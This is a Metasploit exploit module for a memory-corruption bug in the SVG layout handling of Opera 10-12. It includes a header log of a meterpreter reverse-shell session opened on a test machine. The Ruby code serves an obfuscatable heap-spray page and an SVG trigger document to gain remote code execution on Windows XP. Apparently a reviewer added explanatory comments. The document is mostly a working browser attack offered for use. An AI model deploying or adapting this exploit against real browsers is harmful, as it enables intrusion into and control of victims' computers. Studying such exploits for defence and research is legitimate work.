###############################################################################################################
# Exploit for Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day)
#
# Vulnerability:
#
# Discovered: 2010-10-13
# Patched: 0day (no vendor fix was available when this was written; check current
#          vendor advisories before relying on that statement)
# Tested on: v10.xx (v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
#            v11.xx (v11.00, v11.01, v11.10, v11.11, v11.50 and v11.51)
#
# Exploit:
#
# Coded: 2010-10-14
# Last revision: 2011-10-08
#
# This exploit was modified with a new PoC and triggering method, to hit Opera Next.
# The first copy was coded for v10.5x/v10.6x.
#
# RCE on: v11.00, v11.01, v11.10, v11.11, v11.50, v11.51 and v12.00 pre-alpha r1076 (Opera Next)
#
# Notes:
#
# 1) DEP bypass: possible but unreliable.
# 2) Let me know if you improve this one ;)
# 3) Two days ago, Opera Next was updated to 12.00 pre-alpha r1085
#    and this exploit is less reliable, even sometimes never gets crashed.
#    Anyway, I've also seen remote code execution.
# 4) (reviewer note) Both targets return into a 0x0c0c0c0c heap spray and are
#    declared for Windows XP SP3 with DEP off; on hosts where DEP or address
#    randomisation is active the spray address is not reliably reachable, so
#    expect a crash (DoS) rather than code execution there.
#
#
# Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com
#
# Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, EnRed20.org, etc
#
#
# Running against Opera v12.00 pre-alpha r1076...
#
#
#
#                 =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
# + -- --=[ 742 exploits - 378 auxiliary - 83 post
# + -- --=[ 228 payloads - 27 encoders - 8 nops
#                 =[ svn r13810 updated today (2011.10.06)
#
# msf > use windows/browser/opera_svg_0day
# msf exploit(opera_svg_0day) > set payload windows/meterpreter/reverse_tcp
# payload => windows/meterpreter/reverse_tcp
# msf exploit(opera_svg_0day) > set LHOST 192.168.1.103
# LHOST => 192.168.1.103
# msf exploit(opera_svg_0day) > exploit
# [*] Exploit running as background job.
# msf exploit(opera_svg_0day) >
# [*] Started reverse handler on 192.168.1.103:4444
# [*] Using URL: http://0.0.0.0:8080/dpIDdyCpEoqCa5
# [*] Local IP: http://192.168.1.103:8080/dpIDdyCpEoqCa5
# [*] Server started.
# [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off))
# [*] Sending stage 1 (Spraying the heap)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off))
# [*] Sending stage (752128 bytes) to 192.168.1.104
# [*] Sending stage 1 (Spraying the heap)
# [*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.104:1234) at 2011-10-08 22:32:31 +0200
# Interrupt: use the 'exit' command to quit
# msf exploit(opera_svg_0day) > sessions
#
# Active sessions
# ===============
#
#   Id  Type                   Information                               Connection
#   --  ----                   -----------                               ----------
#   1   meterpreter x86/win32  0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12   192.168.1.103:4444 -> 192.168.1.104:1234
#
# msf exploit(opera_svg_0day) > sessions -i 1
# [*] Starting interaction with 1...
#
# meterpreter > execute -f calc.exe
# Process 1752 created.
# meterpreter > exit
# [*] Shutting down Meterpreter...
#
# [*] Meterpreter session 1 closed. Reason: User exit
# msf exploit(opera_svg_0day) >
#
################################################################################################################
require 'msf/core'
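##
# Opera Browser 10/11/12 (SVG layout) memory corruption exploit module.
#
# The module serves a two-stage browser exploit over the HttpServer mixin:
#
#   stage 1 (any URI not ending in ".xhtml") - an HTML page whose JavaScript
#     sprays the heap with the encoded payload and, after a random 2-4 s delay,
#     loads the stage-2 document in an iframe (TriggerVuln());
#   stage 2 (URI ending in ".xhtml") - an XHTML document with the nested SVG
#     markup that corrupts memory.
#
# Both targets return into 0x0c0c0c0c, i.e. the spray must cover that
# address. The target names declare Windows XP SP3 with DEP off; where DEP is
# on or the address is not predictable the result is a crash at best (the
# original author's notes say the same).
##
class Metasploit3 < Msf::Exploit::Remote
  # NOTE(review): the header notes describe reliability dropping on newer
  # Opera Next builds; NormalRanking may be optimistic for those.
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata, the two heap-spray targets and the OBFUSCATE
  # option.
  #
  # @param info [Hash] module info merged through Msf::Module#update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Opera Browser 10/11/12 (SVG layout) Memory Corruption',
      'Description'    => %q{
        This module exploits a vulnerability in the bad nesting with SVG tags. Successfully exploiting
        leads to remote code execution or denial of service condition under Windows XP SP3 (DEP = off).
        Best results of reliability using Opera v12.00 pre-alpha r1076 whereas that v11.xx will have less
        success (depending of opera.dll version). This module won't work against v10.xx because it was
        modified to exploit Opera upper to v11.
        Read the lastest references for further details.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jose A. Vazquez'
        ],
      'Version'        => '$Revision: 0011 $',
      'References'     =>
        [
          [ 'URL', 'http://www.beyondsecurity.com/ssd.html' ],
          [ 'URL', 'http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html' ], # English
          [ 'URL', 'http://enred20.org/node/27' ]                                                         # Spanish
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'          => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked'     => true
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00",
          'Compat'          =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Plain block spray (~450 MB according to the original author).
          # MaxOffset/MaxSize are not used by the 'usual' method.
          [ 'Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)',
            {
              'Method'    => 'usual',
              'MaxOffset' => nil,
              'MaxSize'   => nil,
              'MaxBlocks' => 900,
              'Ret'       => 0x0c0c0c0c
            }
          ],
          # VirtualAlloc-sized spray. Thanks to sinn3r of metasploit.com for this method.
          [ 'Opera Browser (v11.xx) / Windows XP SP3 (DEP-off)',
            {
              'Method'    => 'precise-allocation-size',
              'MaxOffset' => 0x800,
              'MaxSize'   => 0x80000,
              'MaxBlocks' => 0x500,
              'Ret'       => 0x0c0c0c0c
            }
          ]
        ],
      # NOTE(review): '0day' is not a parseable date, so the framework's
      # disclosure-date accessor cannot derive a date from it; replace with the
      # real publication date once known.
      'DisclosureDate' => '0day',
      'DefaultTarget'  => 0))

    # JavaScript obfuscation of the stage-1 page is on by default.
    register_options(
      [
        OptBool.new('OBFUSCATE', [ false, 'JavaScript obfuscation', true ])
      ], self.class)
  end

  # HTTP request handler. URIs ending in ".xhtml" get the stage-2 trigger
  # document; every other URI gets the stage-1 heap-spray page. After the
  # response is sent the payload handler is run for the connection
  # (ConnectionType '-find').
  #
  # @param cli [Rex::Proto::Http::Client] the connected client
  # @param request [Rex::Proto::Http::Request] the incoming request
  # @return [void]
  def on_request_uri(cli, request)
    mytarget = target

    # \z rather than $: the whole URI must end in .xhtml, not just a line of it.
    if request.uri =~ /\.xhtml\z/
      html = trigger_page
      print_status("Sending stage 2 (Triggering the vulnerability)")
      content_type = 'application/xhtml+xml'
    else
      print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (Method: #{mytarget['Method']} / Target: #{mytarget.name})")
      # No payload means no response for this request (same as the original).
      return if regenerate_payload(cli).nil?
      html = spray_page(cli, mytarget)
      print_status("Sending stage 1 (Spraying the heap)")
      content_type = 'text/html'
    end

    send_response(cli, html, { 'Content-Type' => content_type, 'Pragma' => 'no-cache' })
    handler(cli)
  end

  private

  # Stage 2: the XHTML document whose nested SVG markup triggers the bug.
  # The markup is reproduced exactly; the empty meta refresh URL is part of
  # the original trigger and is left as-is.
  #
  # @return [String] the XHTML body
  def trigger_page
    %Q|
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svt="http://www.w3.org/2000/svg">
<head>
<meta http-equiv="refresh" content="0;url=" />
</head>
<select1 style = 'padding-bottom: 8711px;background-image: url("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH");' >
<svt:svg>
<svt:title style = 'pointer-events: visiblePainted;font: normal small-caps 120%/120% fantasy;' >
<svt:svg>
<svt:font>
<svt:animateMotion>
feFuncR
</svt:animateMotion>
</svt:font>
</svt:svg>
</svt:title>
</svt:svg>
</select1>
</html>
|
  end

  # Absolute base URL the victim uses to fetch the stage-2 document. When
  # SRVHOST is the wildcard address, the interface facing the client is used.
  # SRVPORT is interpolated rather than concatenated so an Integer value does
  # not raise TypeError.
  #
  # @param cli [Rex::Proto::Http::Client] the connected client
  # @return [String] e.g. "http://192.168.1.103:8080/dpIDdyCpEoqCa5"
  def exploit_url(cli)
    scheme = datastore['SSL'] ? 'https' : 'http'
    host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    "#{scheme}://#{host}:#{datastore['SRVPORT']}#{get_resource}"
  end

  # Builds the heap-spray JavaScript for the target's 'Method', plus a
  # TriggerVuln() function that injects the stage-2 iframe.
  #
  # @param mytarget [Msf::Module::Target] selected target (Method, MaxBlocks, ...)
  # @param shellcode [String] the payload as a %u-escaped string
  # @param trigger_url [String] absolute URL of the stage-2 .xhtml document
  # @return [String] JavaScript source (not yet obfuscated)
  def spray_js_for(mytarget, shellcode, trigger_url)
    if mytarget['Method'] == 'usual'
      # A %uXXXX escape is one UTF-16 code unit stored little-endian, so the
      # sled has to carry the low word of Ret first and the high word second.
      # For the configured 0x0c0c0c0c this yields the same byte stream as the
      # original single "%u0c0c" unit (the sled is doubled until it fills the
      # block anyway), but it stays correct for a Ret whose halves differ.
      sled_lo = '%04x' % (mytarget.ret & 0xffff)
      sled_hi = '%04x' % ((mytarget.ret >> 16) & 0xffff)
      <<-JS
var shell = unescape("#{shellcode}");
var size = shell.length * 2;
var nopsize = 0x100000 - (size + 0x14);
var nopsled = unescape("%u#{sled_lo}%u#{sled_hi}");
while(nopsled.length * 2 < nopsize) {
nopsled += nopsled;
}
var blocks = new Array();
for (var x = 0; x < #{mytarget['MaxBlocks']}; x++) {
blocks[x] = nopsled + shell;
}
function TriggerVuln(){
document.write("<iframe src='#{trigger_url}'></iframe>");
}
      JS
    else
      # Tested on Opera v11.5x but not working on Opera v12.00 pre-alpha.
      # NOTE(review): this spray hard-codes 0x0c0c as filler and ignores the
      # target's Ret value.
      #
      # Heap spray for Opera that uses VirtualAlloc.
      #   @blocks     - an empty array
      #   @code       - the payload
      #   @offset     - padding to align the code
      #   @chunk_max  - max size for each allocation
      #   @blocks_max - max blocks
      <<-JS
function heap_spray(blocks, code, offset, chunk_max, blocks_max) {
if (chunk_max < 0x7F000) {
throw "This function is meant for size 0x7F000 or higher to trigger VirtualAlloc";
}
chunk_max /= 2;
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < chunk_max) nops += nops;
var offset_chunk = nops.substr(0, offset-code.length);
var block = offset_chunk + code + nops.substr(0, chunk_max-offset_chunk.length-code.length);
while (block.length % 8 != 0) block += unescape("%u0c");
var shellcode = block.substr(0, (chunk_max-0x1c)/2);
for (var i=0; i < blocks_max; i++) {
blocks[i] = shellcode + unescape("%u0c0c");
}
}
var blocks = new Array();
var code = unescape("#{shellcode}");
heap_spray(blocks, code, #{mytarget['MaxOffset']}, #{mytarget['MaxSize']}, #{mytarget['MaxBlocks']});
function TriggerVuln(){
document.write("<iframe src='#{trigger_url}'></iframe>");
}
      JS
    end
  end

  # Stage 1: the HTML landing page. Its script sprays the heap and then calls
  # TriggerVuln() via setTimeout after a random 2-4 s delay so the spray has
  # settled before the trigger is fetched.
  #
  # @param cli [Rex::Proto::Http::Client] the connected client
  # @param mytarget [Msf::Module::Target] selected target
  # @return [String] the HTML body
  def spray_page(cli, mytarget)
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
    timer_ms = (rand(3) + 2) * 1000
    trigger_url = "#{exploit_url(cli)}/#{rand_text_alpha(rand(30) + 2)}.xhtml"
    js = spray_js_for(mytarget, shellcode, trigger_url)

    # Kept as an explicit comparison as in the original: whether the datastore
    # hands back a real boolean for an OptBool depends on the framework
    # version - TODO confirm before relaxing this to a truthiness check.
    if datastore['OBFUSCATE'] == true
      obfu = ::Rex::Exploitation::JSObfu.new(js)
      obfu.obfuscate
      # The obfuscator renames symbols; resolve the new name of TriggerVuln.
      js = obfu.to_s + "setTimeout('#{obfu.sym('TriggerVuln')}()',#{timer_ms});"
    else
      js = js.to_s + "setTimeout('TriggerVuln()',#{timer_ms});"
    end

    # The original closed the document with a second "<html>"; fixed to "</html>".
    %Q|
<html>
<head>
<script type="text/javascript">
#{js}
</script>
</head>
</html>
|
  end
end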
